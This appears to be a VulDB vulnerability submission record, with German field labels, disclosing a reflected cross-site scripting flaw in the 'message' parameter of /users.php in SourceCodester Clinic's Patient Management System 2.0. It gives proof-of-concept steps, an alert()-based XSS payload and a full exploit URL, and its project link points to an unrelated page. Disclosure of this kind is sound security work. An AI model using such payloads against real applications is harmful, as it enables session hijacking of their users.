| Titel | SourceCodester Clinics Patient Management System 2.0 Cross Site Scripting |
|---|
| Beschreibung | Reflected XSS vulnerability was discovered in Sourcecodester's Clinic's Patient Management System - PHP 2.0 via message paramter
Affected Project: https://www.sourcecodester.com/php/17556/contact-manager-export-vcf-using-php-and-mysql-source-code.html
Official Website: Sourcecodester Clinic's Patient Management System
Version: 2.0
Releted Code: /users.php Line Number: 256-259
parameter: /users.php?message=hello
POC:
1. Download and setup the Clinic's Patient Management System - PHP 2.0
2.Login to the account and go to the "/users.php?message=hello
3. Now replace the message parameter value with xss payload
"><img src=x onerror=alert()>
4. Observer Reflected XSS
Direct link click after login: (for more details check advisory link)
5. http://192.168.95.115/users.php?message="><img src=x onerror=alert()>
|
|---|
| Quelle | ⚠️ https://github.com/gurudattch/CVEs/blob/main/Sourcecodester-Clinic's-Patient-Management-System-Reflected-XSS.md |
|---|
| Benutzer | guru (UID 74056) |
|---|
| Einreichung | 04.09.2024 12:07 (vor 2 Jahren) |
|---|
| Moderieren | 06.09.2024 23:22 (2 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 276773 [SourceCodester Clinics Patient Management System 2.0 /users.php Message Cross Site Scripting] |
|---|
| Punkte | 20 |
|---|